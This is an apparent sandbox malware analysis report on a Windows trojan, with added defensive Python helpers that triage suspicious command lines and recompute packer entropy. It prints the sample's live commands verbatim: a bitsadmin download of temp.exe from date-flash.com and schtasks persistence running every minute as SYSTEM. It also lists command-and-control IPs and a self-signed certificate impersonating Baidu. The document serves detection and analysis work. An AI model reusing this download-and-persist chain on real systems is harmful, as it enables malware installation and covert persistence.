Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | June 21, 2021, 12:38 p.m. | June 21, 2021, 12:54 p.m. |
Process | PID | Command line |
---|---|---|
cmd.exe | 6116 | C:\Windows\system32\cmd.exe /C bitsadmin /transfer GoogleUpdated /download /priority normal "http://date-flash.com/temp.exe" "c:\Windows\temp\temp.exe" |
bitsadmin.exe (child of 6116) | 3660 | bitsadmin /transfer GoogleUpdated /download /priority normal "http://date-flash.com/temp.exe" "c:\Windows\temp\temp.exe" |
cmd.exe | 3908 | C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe |
schtasks.exe (child of 3908) | 2120 | schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe |
cmd.exe | 3360 | C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe |
schtasks.exe (child of 3360) | 4368 | schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe |
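The process tree above is the classic living-off-the-land chain: BITS pulls the payload into C:\Windows\temp and two scheduled tasks re-launch it every minute, one with /RL HIGHEST and one as SYSTEM. The triage helper below is an added example, not part of the sandbox report or of any vendor tooling; it parses raw command lines of this shape and returns structured findings. Its inputs are the three command lines from the report plus one constructed benign task (name "NightlyBackup", path under Program Files, both made up) to show what does not get flagged; the writable-directory list and the "every 5 minutes or faster" threshold are the author's own heuristics.

```python
"""Triage helper for the cmd.exe -> bitsadmin / schtasks chain seen in the process tree.

Added example, not part of the sandbox report. It takes raw command lines (the three
from the report plus one constructed benign line) and returns structured findings.
"""
import re
from dataclasses import dataclass, field

# The three command lines from the report above, plus a constructed benign task
# (daily schedule, action under Program Files) that should produce no finding.
SAMPLE_CMDLINES = [
    r'C:\Windows\system32\cmd.exe /C bitsadmin /transfer GoogleUpdated /download /priority normal "http://date-flash.com/temp.exe" "c:\Windows\temp\temp.exe"',
    r"C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe",
    r"C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe",
    r'schtasks /create /sc daily /tn "NightlyBackup" /tr "C:\Program Files\Backup\backup.exe"',  # constructed, benign
]

# Directories any local user can write to (author's list); a task action or
# download target in one of these is a red flag.
WRITABLE_DIRS = (r"\windows\temp", r"\users\public", r"\programdata", r"\appdata\local\temp")


@dataclass
class Finding:
    tool: str                 # "bitsadmin" or "schtasks"
    reasons: list             # one human-readable reason per matched heuristic
    details: dict = field(default_factory=dict)


def _opt(cmd: str, name: str):
    """Value of a /name switch: double-quoted, single-quoted, or bare. None if absent."""
    m = re.search(r"/%s\s+(?:\"([^\"]*)\"|'([^']*)'|(\S+))" % re.escape(name), cmd, re.I)
    return None if m is None else next(g for g in m.groups() if g is not None)


def _in_writable_dir(path) -> bool:
    return path is not None and any(d in path.lower() for d in WRITABLE_DIRS)


def triage(cmd: str):
    """Return a Finding for a suspicious bitsadmin/schtasks command line, else None."""
    low = cmd.lower()
    if "bitsadmin" in low and "/transfer" in low:
        url = re.search(r"https?://[^\s\"']+", cmd, re.I)
        paths = re.findall(r"[A-Za-z]:\\[^\"'\s]+", cmd)   # last drive path is the local target
        url = url.group(0) if url else None
        dest = paths[-1] if paths else None
        reasons = ["file download through BITS (bitsadmin /transfer)"]
        if url and url.lower().startswith("http://"):
            reasons.append("payload fetched over cleartext HTTP")
        if _in_writable_dir(dest):
            reasons.append("payload written to a world-writable system directory")
        return Finding("bitsadmin", reasons, {"job": _opt(cmd, "transfer"), "url": url, "dest": dest})

    if "schtasks" in low and "/create" in low:
        task, sched, mod = _opt(cmd, "tn"), _opt(cmd, "sc"), _opt(cmd, "mo")
        action, run_as, run_level = _opt(cmd, "tr"), _opt(cmd, "ru"), _opt(cmd, "rl")
        reasons = []
        # /sc minute with /mo <= 5 (or no /mo, which means 1) is a watchdog-style trigger
        if sched and sched.lower() == "minute" and (mod is None or (mod.isdigit() and int(mod) <= 5)):
            reasons.append("high-frequency trigger (every %s minute(s))" % (mod or "1"))
        if run_as and run_as.upper() == "SYSTEM":
            reasons.append("runs as SYSTEM (/RU SYSTEM)")
        if run_level and run_level.upper() == "HIGHEST":
            reasons.append("runs with highest privileges (/RL HIGHEST)")
        if _in_writable_dir(action):
            reasons.append("task action lives in a world-writable system directory")
        if reasons:
            return Finding("schtasks", reasons, {"task": task, "schedule": sched, "action": action})
    return None


def triage_all(cmdlines):
    return [f for f in (triage(c) for c in cmdlines) if f is not None]


if __name__ == "__main__":
    for f in triage_all(SAMPLE_CMDLINES):
        print(f.tool, f.details, "->", "; ".join(f.reasons))
```

Feed it the command-line column of a Sysmon event 1 or 4688 export and the same three findings fall out; the benign daily task yields nothing because none of the heuristics (minute-level trigger, SYSTEM or highest run level, writable directory) apply to it.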
Name | Response | Post-Analysis Lookup |
---|---|---|
date-flash.com | 103.209.101.233 | |
Suricata Alerts
Suricata TLS
All twelve TLS flows go from the sandbox guest to 103.72.4.166:8443 over TLSv1 and present the same certificate. The issuer and subject are identical, i.e. the certificate is self-signed, and it merely claims CN=www.baidu.cn rather than chaining to any Baidu-controlled CA.

Flow |
---|
TLSv1 192.168.56.102:49809 -> 103.72.4.166:8443 |
TLSv1 192.168.56.102:49810 -> 103.72.4.166:8443 |
TLSv1 192.168.56.102:49821 -> 103.72.4.166:8443 |
TLSv1 192.168.56.102:49823 -> 103.72.4.166:8443 |
TLSv1 192.168.56.102:49824 -> 103.72.4.166:8443 |
TLSv1 192.168.56.102:49825 -> 103.72.4.166:8443 |
TLSv1 192.168.56.102:49826 -> 103.72.4.166:8443 |
TLSv1 192.168.56.102:49828 -> 103.72.4.166:8443 |
TLSv1 192.168.56.102:49829 -> 103.72.4.166:8443 |
TLSv1 192.168.56.102:49827 -> 103.72.4.166:8443 |
TLSv1 192.168.56.102:49811 -> 103.72.4.166:8443 |
TLSv1 192.168.56.102:49822 -> 103.72.4.166:8443 |

Certificate field | Value |
---|---|
Issuer | C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn |
Subject | C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn (identical to the issuer: self-signed) |
Fingerprint (SHA-1) | f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1 |
Suspicious features | Request |
---|---|
Connection to IP address | GET http://61.135.169.121/ |
Connection to IP address | GET https://103.72.4.166:8443/images/logo_max.png |
Connection to IP address | GET https://103.72.4.166:8443/images/logo.png |
POST method with no referer header, Connection to IP address | POST https://103.72.4.166:8443/user/CheckLogin?ticket=C75j6UbqNtpG-jKQRdQ62w |

Request |
---|
GET http://61.135.169.121/ |
HEAD http://date-flash.com/temp.exe |
GET https://103.72.4.166:8443/images/logo_max.png |
GET https://103.72.4.166:8443/images/logo.png |
POST https://103.72.4.166:8443/user/CheckLogin?ticket=C75j6UbqNtpG-jKQRdQ62w |
POST https://103.72.4.166:8443/user/CheckLogin?ticket=C75j6UbqNtpG-jKQRdQ62w |
cmdline | C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe |
cmdline | C:\Windows\system32\cmd.exe /C bitsadmin /transfer GoogleUpdated /download /priority normal "http://date-flash.com/temp.exe" "c:\Windows\temp\temp.exe" |
cmdline | schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe |
cmdline | C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe |
cmdline | schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe |
section | UPX1 | virtual_address | 0x0031c000 | virtual_size | 0x00351000 | size_of_data | 0x00350c00 | entropy | 7.869545546306953 | description | A section with a high entropy has been found |
entropy | 0.999852746282 | description | Overall entropy of this PE file is high (this figure is the share of the file's section data that sits in high-entropy sections, not a bits-per-byte value) |
section | UPX0 | description | Section name indicates UPX |
section | UPX1 | description | Section name indicates UPX |
section | UPX2 | description | Section name indicates UPX |
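The three static-analysis hits above (a 7.87-bit-per-byte section, a 0.9998 "overall entropy", and UPX-named sections) come from a handful of lines of arithmetic over the PE section table, and it is worth seeing them recomputed so the numbers are not taken on faith. The block below is an added example, not code from the report or from the sandbox: it walks the section table of a PE image, computes Shannon entropy per section, and reports the fraction of raw section data that lies in sections above a threshold. The 6.8 threshold is an assumption modelled on Cuckoo's community packer-entropy signature; the sample PE is constructed in code (header-only, with pseudo-random bytes standing in for the UPX1 payload and 512 zero bytes for UPX2) and is not the analysed file.

```python
"""Recompute the per-section entropy and 'packed ratio' behind the report's UPX/entropy hits.

Added example; the PE built here is a constructed stand-in, not the analysed sample.
"""
import hashlib
import math
import struct
from collections import Counter

HIGH_ENTROPY = 6.8  # assumed threshold (modelled on Cuckoo's packer_entropy signature)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes):
    """Minimal section-table walk: MZ -> e_lfanew -> 'PE\\0\\0' -> COFF header -> 40-byte section headers."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsect = struct.unpack_from("<H", pe, coff + 2)[0]          # NumberOfSections
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]      # SizeOfOptionalHeader
    first_hdr = coff + 20 + opt_size
    sections = []
    for i in range(nsect):
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, first_hdr + 40 * i)
        raw = pe[rawptr:rawptr + rawsize]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_address": vaddr, "virtual_size": vsize,
                         "size_of_data": rawsize, "entropy": shannon_entropy(raw)})
    return sections


def packer_verdict(sections):
    """Mirror the three signatures: high-entropy sections, packed ratio, UPX section names."""
    flagged = [s for s in sections if s["entropy"] > HIGH_ENTROPY]
    total = sum(s["size_of_data"] for s in sections)
    packed = sum(s["size_of_data"] for s in flagged)
    return {"high_entropy_sections": [s["name"] for s in flagged],
            "packed_ratio": packed / total if total else 0.0,
            "upx_sections": [s["name"] for s in sections if s["name"].upper().startswith("UPX")]}


def build_sample_pe() -> bytes:
    """Constructed stand-in: UPX0 with no raw data, UPX1 = 64 KiB of SHA-256 output, UPX2 = 512 zero bytes."""
    body = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(2048))
    tail = b"\0" * 512
    e_lfanew = 0x40
    headers_end = e_lfanew + 4 + 20 + 3 * 40      # no optional header (SizeOfOptionalHeader = 0)
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x8664, 3, 0, 0, 0, 0, 0x22)

    def section_header(name, vsize, vaddr, rawsize, rawptr):
        return struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, rawsize, rawptr, 0, 0, 0, 0, 0x60000020)

    table = (section_header(b"UPX0", 0x31C000, 0x1000, 0, 0)
             + section_header(b"UPX1", 0x11000, 0x31D000, len(body), headers_end)
             + section_header(b"UPX2", 0x1000, 0x32E000, len(tail), headers_end + len(body)))
    return dos + b"PE\0\0" + coff + table + body + tail


if __name__ == "__main__":
    secs = parse_sections(build_sample_pe())
    for s in secs:
        print("%-5s size_of_data=0x%08x entropy=%.4f" % (s["name"], s["size_of_data"], s["entropy"]))
    print(packer_verdict(secs))
```

The same arithmetic explains the report's 0.999852746282: with UPX1 at size_of_data 0x00350c00 and a 0x200-byte UPX2 (the UPX2 size is inferred from the ratio, the report does not print it), 0x350c00 / (0x350c00 + 0x200) = 1 - 1/6791 = 0.99985274628, so effectively the whole file is one high-entropy blob, which is exactly what a UPX-packed binary looks like before unpacking.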
cmdline | C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe |
cmdline | schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe |
cmdline | C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe |
cmdline | schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe |
host | 103.72.4.166 |
host | 172.217.25.14 |
host | 61.135.169.121 |
cmdline | C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe |
cmdline | schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe |
cmdline | C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe |
cmdline | schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe |
process | temp.exe | useragent | |||||||
process | temp.exe | useragent | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 |
cmdline | bitsadmin /transfer GoogleUpdated /download /priority normal "http://date-flash.com/temp.exe" "c:\Windows\temp\temp.exe" |
cmdline | C:\Windows\system32\cmd.exe /C bitsadmin /transfer GoogleUpdated /download /priority normal "http://date-flash.com/temp.exe" "c:\Windows\temp\temp.exe" |
cmdline | C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe |
cmdline | schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe |
Engine | Result |
---|---|
Elastic | malicious (high confidence) |
MicroWorld-eScan | Trojan.GenericKD.37043105 |
FireEye | Generic.mg.d89c813bf46d01f1 |
McAfee | Artemis!D89C813BF46D |
Cylance | Unsafe |
Zillya | Trojan.Rozena.Win32.124132 |
Sangfor | Riskware.Win32.Agent.ky |
K7AntiVirus | Trojan ( 0056c3071 ) |
Alibaba | Backdoor:Win64/Shelma.da3ddcc0 |
K7GW | Trojan ( 0056c3071 ) |
Cybereason | malicious.4cb10c |
Cyren | W64/Trojan.MYRZ-7542 |
Symantec | Trojan.Gen.2 |
ESET-NOD32 | a variant of Win32/Rozena.AVL |
APEX | Malicious |
Avast | Win64:Trojan-gen |
Kaspersky | Trojan.Win64.Shelma.lbo |
BitDefender | Trojan.GenericKD.37043105 |
Paloalto | generic.ml |
Tencent | Win64.Trojan.Shelma.Wstw |
Ad-Aware | Trojan.GenericKD.37043105 |
Sophos | Mal/Generic-S |
F-Secure | Trojan.TR/Rozena.sdjwo |
DrWeb | Trojan.DownLoader39.52985 |
VIPRE | Trojan.Win32.Generic!BT |
TrendMicro | TROJ_GEN.R011C0WF821 |
McAfee-GW-Edition | BehavesLike.Win64.Gravity.wc |
Emsisoft | Trojan.GenericKD.37043105 (B) |
Ikarus | Trojan.Win32.Rozena |
Jiangmin | Trojan.Shelma.ilj |
MaxSecure | Trojan.Malware.300983.susgen |
Avira | TR/Rozena.sdjwo |
Antiy-AVL | Trojan/Generic.ASBOL.C5E3 |
Gridinsoft | Suspicious.XOR_Encoded.bot!yf |
Microsoft | Trojan:Win32/Glupteba!ml |
ZoneAlarm | Trojan.Win64.Shelma.lbo |
GData | Trojan.GenericKD.37043105 |
Cynet | Malicious (score: 100) |
ALYac | Trojan.GenericKD.37043105 |
MAX | malware (ai score=88) |
VBA32 | Trojan.Win64.Shelma |
TrendMicro-HouseCall | TROJ_GEN.R011C0WF821 |
Yandex | Trojan.Shelma!1U+6LbCbUgU |
Fortinet | W64/Shelma.AVL!tr |
AVG | Win64:Trojan-gen |
Panda | Trj/CI.A |
CrowdStrike | win/malicious_confidence_80% (W) |